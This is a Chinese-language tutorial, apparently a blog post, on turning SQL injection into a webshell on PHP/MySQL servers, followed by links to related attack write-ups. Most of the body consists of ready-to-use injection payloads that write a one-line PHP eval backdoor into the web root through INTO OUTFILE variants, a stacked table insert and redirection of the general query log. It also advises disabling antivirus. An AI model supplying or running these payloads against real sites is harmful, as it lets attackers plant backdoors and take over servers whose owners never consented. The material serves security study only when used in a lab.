一、getshell的含义

1.什么是shell？

2.什么是webshell?

3.什么是getshell

二、大马和小马的比较

三、SQL注入getshell

1.写文件--into outfile

2.union select getshell

3.lines starting getshell

4.fields terminated getshell

5.COLUMNS terminated getshell

6.getshell-数据表getshell

7.getshell-日志getshell

一、getshell的含义

1.什么是shell？

Shell 是一个程序，提供一个用户与操作系统内核连接的环境。这个环境只有一个命令提示符，让用户从键盘输入命令，所以又称为命令行环境。

2.什么是webshell?

WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后门，得到一个命令执行环境，以达到控制网站服务器的目的。

3.什么是getshell

攻击者通过多种漏洞常见如文件上传、SQL注入、命令执行、文件包含、解析漏洞等，将脚本文件上传到Web服务器，并让服务器解析，从而使攻击者能得到一个与服务器进行交互的命令执行环境，进而得以控制服务器。

二、大马和小马的比较

	小马（一句话木马）	大马
功能	功能简单，需要配合客户端使用	功能完善，直接使用浏览器即可利用
文件大小	代码量通常在一行左右，不超过10行	代码量通常较大
隐蔽性	强，容易通过变形隐藏特征，绕过过滤	相对较弱，代码量大，通常需要通过加密等方式来隐藏特征。

三、SQL注入getshell

1.写文件--into outfile

前提：

网站的绝对路径
没有对引号进行过滤
文件必须有写的权限

2.union select getshell

payload:1' union select 1,'<?php eval("$_POST[2]")?>',3 into outfile 'd:/phpstudy_pro/www/1.php'--+

注意：需要关闭电脑的病毒检测

使用c刀连接

2.lines terminated by

lines terminated by 该语句是设置每行数据结尾的字符，可以设置为单个或多个字符，默认为“/n”;

payload: ?id=1' into outfile 'd:/phpstudy_pro/www/2.php'lines terminated by'<?php eval("$_POST[8]")?>'--+3.

3.lines starting getshell

lines starting getshell该语句为设置每行开头的字符

payload：?id=1' into outfile 'd:/phpstudy_pro/www/3.php'lines starting by'<?php eval("$_POST[8]")?>'--+

4.fields terminated getshell

fields terminated by 设置字段之间的分隔符，默认值是"\t"

payload：?id=1')) into outfile'd:/phpstudy_pro/www/4.php' fields terminated by '<?php eval("$_POST[8]")?>'--+

5.COLUMNS terminated getshell

COLUMNS terminated by 设置字段之间的分隔符，默认值是"\t"

payload：?id=1')) into outfile'd:/phpstudy_pro/www/6.php' COLUMNS terminated by'<?php eval("$_POST[4]")?>'--+

6.getshell-数据表getshell

前提：需要将shell内容插入数据表中，在将表内容写成可执行文件，所以要想利用它getshell，一般数据库有堆叠注入或phpmyadmin或有一个数据库的基本权限才能getshell。

payload：id=1';insert into users(username,password) values('<?php eval("','$_POST[2]")?>')--+

7.getshell-日志getshell

7.1 开启全局日志配置

payload：?id=1';set global general_log = on;--+

7.2设置日志路径（webshell路径）

id=1';set global general_log_file = 'd:/phpStudy_pro/WWW/8.php';--+

7.3写入木马病毒

id=1';select '<?php eval("$_POST[2]")?>';--+

payload：

SQL注入-getshell相关推荐

mysql注入反弹_Discuz!x xss反弹后台无防御sql注入getshell(附带exploit)
### 简要描述: Discuz!x xss反弹后台无防御sql注入getshell,这里的xss只是做一个药引子,因为xss来自日志功能,然而这个日志功能却又默认关闭的,为了测试我们开启它.这个漏洞 ...
SQL注入getshell
通过数据库的into outfie可以写入一句话木马进行getshell,由于利用环境相对苛刻,实际环境不常见,现以bWAPP靶场作为验证环境. 选择SQL Injection (GET/Select ...
Emlog漏洞————Emlog相册插件前台SQL注入+Getshell
Emlog简介 Emlog是"Every Memory Log"的简介,意即:点滴记忆.它是一款基于PHP语言哈MYSQL数据库的开源.免费.功能强大的个人或多人联合撰写的博客系统 ...
禅道826版本SQL注入，登录绕过以及禅道826后台GetShell的小技巧
SQL注入由 orderBy($order) 函数过滤不严格导致.但是,这个函数对传进的参数进行了一系列过滤,导致 getshell 的条件比较苛刻.不甘心,于是乎找了一个比较好利用的地方.我只是以这 ...
mysql 漏洞 wa_[漏洞案例]thinkcmf 2.x从sql注入到getshell实战
文章中提到了三个漏洞,一个注入,两个模板注入写shell. 但是系统是部署在linux下面的,模板注入是不行的. 所以文章编辑处的sql注入漏洞是比较好的方法了. 但是这里的注入需要登陆. 虽然网站默 ...
从sql注入到getshell (内附sqlmap的os-shell遇到中文路径的解决办法）
`搜索公众号:白帽子左一,每天更新技术干货! 作者:掌控安全学员--君叹基本界面试试看信息列表里面随便点一条看下网络请求可以看到一个带有参数的请求,我们试着直接访问直接访问的话能够看到直接的文 ...
仿5173游戏交易平台系统SQL注入(可直接脱裤)+Getshell
最近没事登登好几年前玩过的游戏看看,发现有人喊高价收号,这一看就是骗子,这等骗子还想骗我?我就来看看这逗逼是怎么骗人的,结果发现这人给了一个说是 5173平台交易的网站,叫我直接把号的信息填上去然后填 ...
网络安全-实战篇 ZZZPHP1.61 代码审计-从SQL注入到Getshell
近期有很多小伙伴在后台留言想看关于代码审计的文章,其实有关审计的文章网上资源是比较多的,但是从代码审计开始到结束的这类文章却少之甚少. 今天要讲解的ZZZPHP1.61这套审计漏洞比较多,SQL注入漏 ...
pythom打包文件太大_从SQL注入到整站打包与本地搭建
一.前言如题,由于是在已知有一处sql注入的情况下才接手进行的后续操作,因此前面信息搜集则一笔带过. 二.信息搜集目标是个本地的传销站点其大致信息为IIS+ASP.NET+安全狗.腾讯云. 三.B ...

SQL注入-getshell

一、getshell的含义

1.什么是shell？

2.什么是webshell?

3.什么是getshell

二、大马和小马的比较

三、SQL注入getshell

1.写文件--into outfile

2.union select getshell

3.lines starting getshell

4.fields terminated getshell

5.COLUMNS terminated getshell

6.getshell-数据表getshell

7.getshell-日志getshell

SQL注入-getshell相关推荐

最新文章

热门文章